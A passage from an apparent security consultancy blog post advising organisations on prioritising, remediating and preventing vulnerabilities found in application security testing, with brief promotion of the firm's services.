When an application was developed without awareness of a threat, it is often more vulnerable to it, and when it was built on a technology that was less mature in approaching the threat remediating the issues can be far more difficult. For instance, try remediating SQL injection in a legacy ASP application by changing queries from string concatenation to parameterized queries (ADODB objects aren’t exactly elegant to use!).

Dealing with issues

Once you have found issues, then comes the daunting task of prioritizing, managing, and preventing their reoccurrence. This is the part that can bring the shock, and the part that can require the most care, as this is a task in managing complexity.

The response to issues requires not only looking at what you have found previously, but also what you have to do, and where you want to go. Breaking this down:

  1. Understand the Past – Deal with existing issues
  2. Manage the Present – Remedy old issues, prevent introduction of new issues where possible
  3.  Prepare for the Future – Expect new threats to arise

Understand the Past – Deal with Existing Issues

When dealing with security reports, it is important to always be psychologically and organizationally prepared for what you find. As already discussed, this is often unpleasant and the first reactions can lead to dangerous behaviors such as overreaction (“fire the person responsible”) or disillusionment (“we couldn’t possibly fix all that!”). The initial results may be frightening, but flight is not an option, so you need to fight.

To understand what you have in front of you, and to react appropriately, it is imperative that the person interpreting the results understands the tools used to develop the application; the threats surrounding the application; and the security tool and its results. If your organization is not confident in this ability, consider getting outside help or consultants (such as Neohapsis) in to explain the background and context of your findings.

 Manage the present – Remedy old issues, prevent introduction of new issues where possible

Much like any software bug or defect, once you have an idea of what your overall results mean you should start making sense of them. This can be greatly aided through the use of a system (such as Neohapsis Security Manager) which can take vulnerability data from a large number of sources and track issues across time in a similar way to a bug tracker.

Issues found should then be dealt with in order of the threat they present to your application and organization. We have often observed a tendency to go for the vulnerabilities labeled as “critical” by a tool, irrespective of their meaning in the context of your business and application. A SQL injection bug in your administration interface that is only accessible by trusted users is probably a lot less serious than a logic flaw that allows users to order items and modify the price communicated and charged to zero.

Also, if required, your organization should rapidly institute training and awareness programs so that no more avoidable issues are introduced. This can be aided by integrating security testing into your QA and pre-production testing.

 Prepare for the future – Expect new threats to arise

Nevertheless, even if you do everything right, and even if your developers do not introduce any avoidable vulnerabilities, new issues will probably be found as the threats evolve. To detect these, you need to regularly have security tests performed (both human and automated), keep up with the security state of the technologies in use, and have plans in place to deal with any new issues that are found.

Closing

It is not unusual to find a frightening degree of insecurity when you first bring your applications into the world of security testing, but diving back to hide is not prudent. Utilizing the right experience and tools can turn being afraid of your own shadow into being prepared for the changes to come. After all, if the cloud isn’t on the horizon for your company then you are probably already immersed in it.